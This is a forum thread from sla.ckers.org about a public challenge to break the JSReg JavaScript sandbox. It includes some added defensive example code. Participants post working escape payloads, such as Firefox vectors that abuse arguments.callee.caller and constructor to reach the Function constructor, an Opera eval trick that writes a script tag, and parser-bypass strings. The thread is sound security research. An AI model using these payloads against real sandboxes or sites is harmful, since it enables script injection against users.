Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 5 of 13
Re: JSReg sandbox challenge
Posted by: sirdarckcat
Date: October 25, 2009 08:29AM

Oh, now that I think about it, JSReg won't be able to handle JSON.

{a:[1,2,3]}

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: JSReg sandbox challenge
Posted by: kangax
Date: October 25, 2009 05:32PM

Isn't negative slice broken in IE?

Re: JSReg sandbox challenge
Posted by: sirdarckcat
Date: October 25, 2009 08:47PM

hmm, if it is, then

Array(0,2).slice(1)

one char less haha

Greetz!!

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 26, 2009 06:13AM

RE JSON

I think I will integrate a separate JSON parser which will use either the native JSON parser or Crockford's, depending on which is available.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: JSReg sandbox challenge
Posted by: kangax
Date: October 26, 2009 11:15AM

@Gareth Are you sure you want to trust native JSON parser? :)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 26, 2009 12:12PM

@kangax

Hehe I don't trust anything, I'd try to validate it first and make sure it's been parsed with JSReg.

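
The "validate it first" step Gareth describes above, as an added example (this is not JSReg's code and not from anyone in the thread): the native parser is used for syntax only, and the result is then walked so that only plain data with safe keys reaches the sandbox. The key list, the depth cap and the function names are assumptions made for the example.

```javascript
'use strict';
// Added example: parse with the native JSON parser, then validate the result
// before handing it to sandboxed code. Hypothetical helper, not JSReg's own.

// Keys that would let sandboxed code reach prototypes or native objects.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const MAX_DEPTH = 32;   // assumption: cap nesting so hostile input cannot exhaust the stack

// Accept only objects, arrays, strings, finite numbers, booleans and null.
function isPlainData(value, depth = 0) {
  if (depth > MAX_DEPTH) return false;
  if (value === null) return true;
  const t = typeof value;
  if (t === 'string' || t === 'boolean') return true;
  if (t === 'number') return Number.isFinite(value);
  if (Array.isArray(value)) return value.every(v => isPlainData(v, depth + 1));
  if (t === 'object') {
    // JSON.parse only produces ordinary objects; anything else is suspicious.
    const proto = Object.getPrototypeOf(value);
    if (proto !== Object.prototype && proto !== null) return false;
    for (const key of Object.keys(value)) {      // own enumerable keys, including "__proto__"
      if (BLOCKED_KEYS.has(key)) return false;
      if (!isPlainData(value[key], depth + 1)) return false;
    }
    return true;
  }
  return false;   // functions, symbols, undefined never come from JSON.parse, but refuse anyway
}

// Returns { ok: true, value } or { ok: false, reason } instead of throwing.
function safeParseJSON(text) {
  let parsed;
  try {
    parsed = JSON.parse(text);
  } catch (e) {
    return { ok: false, reason: 'syntax: ' + e.message };
  }
  if (!isPlainData(parsed)) return { ok: false, reason: 'rejected: unsafe structure or key' };
  return { ok: true, value: parsed };
}
```

Note that JSON.parse creates an own property literally named `__proto__` rather than setting the prototype, which is why the key check is done with Object.keys on the parsed result rather than by inspecting the prototype chain alone.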
Re: JSReg sandbox challenge
Posted by: sirdarckcat
Date: November 15, 2009 09:59AM

bug
z=1/1;x="/+/"/i;

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: November 16, 2009 03:03AM

@sirdarckcat

Awesome bug thanks!

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 15, 2010 04:53AM

Stefano Di Paola broke JSReg after I challenged everyone on the web app sec list. I've since patched JSReg and removed callee, caller and prototype. I know that removing these features limits the JavaScript available in the sandbox, but I don't care; I'd rather secure it than work out how to use the features safely. His vectors are awesome btw.

JSReg now returns strings/objects/regexps as is; it no longer rewrites them. I still match, but this results in much faster performance.

check it out:-

Quote

you call, I execute. :)

== Firefox:
6 examples for the same concept: use constructor with nested call
abusing caller to get Function native reference.

1.
try{
throw Error
}catch(e){ e.constructor(
{ toString:function(){alert(arguments.callee.caller("alert(window)")())}} ) }

2.
Error.constructor({toString:function(){arguments.callee.caller("alert(window)")()}});

3.
(2222..toString).constructor({toString:function(){arguments.callee.caller("alert(window)")()}})

4.
({}.toString).constructor({toString:function(){alert(arguments.callee.caller("alert(window)")())}})

5.
(Object).constructor({toString:function(){alert(arguments.callee.caller)}})

6.
ts={toString:function(){arguments.callee.caller.toString=function(){ arguments.callee.caller("alert(window)")()};Function(arguments.callee.caller)}};
ts in [this]

== Opera:
Different concept, this time prototype native objects and rewrite of
toString with a try{}catch(){} block returning always eval until it is
executed with the real one.

String.prototype.toString=function(){
try{
return "eval";
}catch(e){}
}
s=new String();
eval(s+"")('document.write("<script>alert(location)</script>")');

Explorer:
Can't find anything cause it sucks :D (Hey MS, joking :P)

It was a pleasure playing around with JSreg.

Keep up good work and cheers!
Stefano

Re: JSReg sandbox challenge
Posted by: kangax
Date: March 16, 2010 11:15AM

I can't break it, but I still see bugs :)

({ toString: 1 }).hasOwnProperty('toString'); // false, should be true
[1,2]['length']; // 1, should be 2

And btw, it also breaks [[Class]]-based type inference (not sure if you care about that).

Object.prototype.toString.call(function(){}); // "[object Object]" not "[object Function]"

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 16, 2010 02:39PM

Quote

({ toString: 1 }).hasOwnProperty('toString'); // false, should be true

Great catch thanks!

Quote

[1,2]['length']; // 1, should be 2

This is a limitation of the sandbox syntax. The alternative is :-
Array(1,2)['length']; // should be 2

Quote

Object.prototype.toString.call(function(){});

Yeah this is disabled for now because of Stefano's great attacks. I'm planning to add prototype back when I can make it safe




Edited 1 time(s). Last edit at 03/16/2010 02:39PM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: kangax
Date: March 16, 2010 03:24PM

What about:

[].slice.call([1,2,3], 1)[0]; // `undefined`, should be `2`

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 16, 2010 05:03PM

@kangax

Dude, array literal is not allowed with JSReg syntax; you have to use Array(). This is due to JavaScript's weak regular expression support for look-behind :|


[].slice.call(Array(1,2,3), 1)[0];

Re: JSReg sandbox challenge
Posted by: kangax
Date: March 16, 2010 09:51PM

@Gareth

Gotcha :)

Re: JSReg sandbox challenge
Posted by: Anonymous User
Date: March 24, 2010 05:07PM

/[/*]*//1*alert(1)//[^/*]*/

Description:Syntax error
Msg:unterminated regular expression literal
//1*alert(1)//[^/*]*/
Line:-1

small bug in the regex parser (or comment removal? not sure :) )

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 24, 2010 05:38PM

@mario

Nice! Both actually they're interconnected :)

Working on a fix for this and something else I found

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 25, 2010 06:51AM

@mario

Awesome vector; it proved very difficult to write a regex to match that.

@kangax

The toString hasOwnProperty should be OK now, but this has been modified into a safe property. Mario found that valueOf leaked the window because I allowed valueOf properties so that object literals could use it, but this is dangerous, and so I disabled toString and valueOf.

Re: JSReg sandbox challenge
Posted by: kangax
Date: March 25, 2010 08:35AM

@Gareth

Is there a list of things that are NOT part of jsreg — array literals, valueOf, etc.?

Also, what happened to `for-in`? Doesn't work again:

var o = { x: 1 };
for (var p in o) alert(p); // alerts "JSREG_ITEM"

Something like this seems to trip parser too:

({})[/\u0027/];

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 25, 2010 08:55AM

@kangax

Yeah, sorry, I need a FAQ and a group. I'll sort one out with an issues section too.

Quote

var o = { x: 1 };
for (var p in o) alert(p); // alerts "JSREG_ITEM"

I modified the "for in" code because rewriting to while loops to prevent client-side DoS was causing errors. At the moment JSReg requires a full block loop like for(var p in o) { alert(p); }; this is because I have to match the beginning of the loop and inject $p$=($p$+'').replace(/^[$]/,'').replace(/[$]$/,''); Currently the DoS protection is flawed too; it requires some work :(

Quote

({})[/\u0027/];

Extremely nice! This one is because Firefox (and maybe others) transforms escapes when calling new Function. I use new Function to check syntax before and after converting.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 25, 2010 09:32AM

I've given in to organisation:-
http://code.google.com/p/jsreg/

I'll upload the code here, allow contribs, maybe ports, and sort out an issues list and wiki.

I'm tracking issues here:-
http://code.google.com/p/jsreg/issues/list

and a list of wikis here:-
http://code.google.com/p/jsreg/w/list




Edited 1 time(s). Last edit at 03/25/2010 10:26AM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 29, 2010 06:43AM

Experimental support for Arrays here:-

http://www.businessinfo.co.uk/labs/jsreg/arrays/jsreg.html

Stuff like this should all be detected:-
{}[1,2,3]
[1,2,3];[1,2,3]['__parent__']

The only limitation would be object literals as there's no way to detect if they are a block statement or literal.

e.g.
~{'a':123}['__parent__']// will be forced into an array

This should work though:-
o={a:[1,2,3]}

I think JSReg got a little more practical :)

Re: JSReg sandbox challenge
Posted by: kangax
Date: April 29, 2010 10:07PM

I get error with this: [[1,1][1],[1]]

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 30, 2010 04:06AM

@kangax

Thanks! Cool. Yeah, array detection is tough because even though I can detect the "[" fairly reliably, the closing "]" is very difficult because it occurs in the same pattern whether it's an array or an object accessor. Oh, and detecting everything from "[" to "]" is pretty impossible using JS regexes.

Updated
--------

Fixed it with a bit of a hack; I dunno if this is gonna be possible, but I'll persist. I scan backwards up the parse tree to see what has been matched to decide if it's a closing array or obj access.




Edited 1 time(s). Last edit at 04/30/2010 04:42AM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 30, 2010 04:45AM

AAAAAAAAAAAAAND PWND

1[['__parent__']]

Damn arrays are going :(

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 04, 2010 10:55AM

The Arrays strike back!!!!!

http://www.businessinfo.co.uk/labs/jsreg/arrays/jsreg.html

This time I detect:-
[1,2,3] and convert to A(1,2,3)

Then
a={a:1};a['a']
Converts to:-
$a$={$a$:Number(1)}
$a$.JSREG_ITEM('a')

I'm looking for syntax errors specifically, like incorrect detection of object properties such as objA(1), which should be obj.JSREG_ITEM(1).

Finally I can sleep at night now that hopefully JSReg will detect arrays.

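
The JSREG_ITEM rewrite above (a['a'] becoming $a$.JSREG_ITEM('a')) moves the property check from the regex rewriter to runtime, where the name is known no matter what expression produced it. Here is an added example of such an accessor, written for this page and not taken from JSReg or anyone in the thread: `safeItem`, the denied-name list and the per-type method allowlists are all assumptions. It refuses the names the thread shows reaching the Function constructor or window (caller, callee, constructor, prototype, __parent__, toString, valueOf), including the `1[['__parent__']]` form, because the array key is coerced to a string before the check exactly as the engine would coerce it.

```javascript
'use strict';
// Added example of a JSREG_ITEM-style runtime accessor. A sandbox that rewrites
// every obj[expr] into safeItem(obj, expr) can refuse dangerous property names
// at the moment of access. Hypothetical code, not JSReg's own.

// Names that lead out of the sandbox: refused on every object, own or inherited.
const DENIED_NAMES = new Set([
  'constructor', 'prototype', '__proto__', '__parent__', 'caller', 'callee',
  'arguments', 'toString', 'valueOf', '__defineGetter__', '__defineSetter__',
  '__lookupGetter__', '__lookupSetter__',
]);

// Inherited built-ins the sandbox is willing to expose (assumed allowlists).
const ARRAY_METHODS = new Set(['slice', 'join', 'push', 'pop', 'concat', 'indexOf']);
const STRING_METHODS = new Set(['slice', 'split', 'indexOf', 'charAt', 'replace',
  'toUpperCase', 'toLowerCase']);

// Coerce the key the way obj[key] would: 1[['__parent__']] indexes with
// String(['__parent__']), so the array-wrapped name must be checked as a string.
function propertyName(key) {
  return typeof key === 'symbol' ? '' : String(key);
}

function safeItem(target, key) {
  if (target === null || target === undefined) {
    throw new TypeError('cannot read property of ' + target);
  }
  const name = propertyName(key);
  // Deny-list first, then refuse every dunder name even if it is not listed.
  if (DENIED_NAMES.has(name) || name.startsWith('__')) return undefined;
  // Own properties (object literal members, array elements) are fine.
  if (Object.prototype.hasOwnProperty.call(target, name)) return target[name];
  // Inherited properties must be explicitly allowlisted per type; members of
  // Function.prototype and Object.prototype are otherwise unreachable.
  if (Array.isArray(target) && ARRAY_METHODS.has(name)) return target[name];
  if (typeof target === 'string' && STRING_METHODS.has(name)) return target[name];
  return undefined;
}
```

The deny-list check runs before the own-property check on purpose: `({ toString: 1 })['toString']` is an own property, but the thread's decision was to disable toString and valueOf entirely, so the accessor treats them the same way whether they are own or inherited.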
Re: JSReg sandbox challenge
Posted by: kangax
Date: May 04, 2010 06:53PM

Doesn't this return a `window` now? []['toString']()

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 05, 2010 12:57AM

@kangax

Nope, the type is "string", so it appears harmless, but I'll investigate why it's doing it, as before it wasn't.

Re: JSReg sandbox challenge
Posted by: kangax
Date: May 05, 2010 08:40AM

How about taking care of trailing commas? `[1,]` gives error but shouldn't.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 05, 2010 08:46AM

@kangax

Great point! Thanks! Any suggestions how I can rewrite it to handle trailing commas?

Thinking about it, the best way would be to simply replace:-

[1,]
with:-
[1]

Update...
and fixed doing exactly that :)
This is getting close to me trusting it. Can anyone break it before I commit?




Edited 2 time(s). Last edit at 05/05/2010 09:08AM by Gareth Heyes.

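
Gareth's fix is to rewrite `[1,]` to `[1]` before parsing. The catch with doing that by plain regex is the one the thread has already hit with `z=1/1;x="/+/"/i`: the same characters mean different things inside a string literal. The following added example (written for this page, not JSReg's own rewrite) strips a single trailing comma before `]` or `}` while copying string literals through untouched, and leaves `[1,,]` and `[,]` alone because in JavaScript those commas are array holes, not trailing commas, and removing them would change the array's length. Regex literals and comments are not handled here, which is exactly the ambiguity the thread shows is hard to resolve with regexes.

```javascript
'use strict';
// Added example: normalise a trailing comma before ] or } without touching
// string literals. Hypothetical helper, not JSReg's own code.
function stripTrailingCommas(src) {
  let out = '';
  let prev = '';          // last non-whitespace character emitted so far
  let i = 0;
  while (i < src.length) {
    const ch = src[i];
    if (ch === '"' || ch === "'") {
      // Copy the whole string literal verbatim, honouring backslash escapes,
      // so a comma or bracket inside "[1,]" as text is never rewritten.
      let j = i + 1;
      while (j < src.length && src[j] !== ch) {
        if (src[j] === '\\') j++;       // skip the escaped character
        j++;
      }
      out += src.slice(i, j + 1);       // includes the closing quote
      prev = ch;
      i = j + 1;
      continue;
    }
    // Only a comma that follows a value is a candidate: after '[' or ','
    // it is an elision ([,] and [1,,]) and removing it changes the length.
    if (ch === ',' && prev !== ',' && prev !== '[' && prev !== '{') {
      let j = i + 1;
      while (j < src.length && /\s/.test(src[j])) j++;   // look past whitespace
      if (src[j] === ']' || src[j] === '}') {
        i++;                            // drop the comma; JS ignores one trailing comma anyway
        continue;
      }
    }
    out += ch;
    if (!/\s/.test(ch)) prev = ch;
    i++;
  }
  return out;
}
```

Because the scanner tracks the previous significant character, `[1,]` becomes `[1]` (same value in every engine) while `[1,,]` is returned unchanged, which matters because `[1,,].length` is 2 and a naive rewrite to `[1]` would silently change it.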
Re: JSReg sandbox challenge
Posted by: kangax
Date: May 05, 2010 11:19PM

I don't think it's ready yet...

[{},{}[[]]]; // errors out, but shouldn't
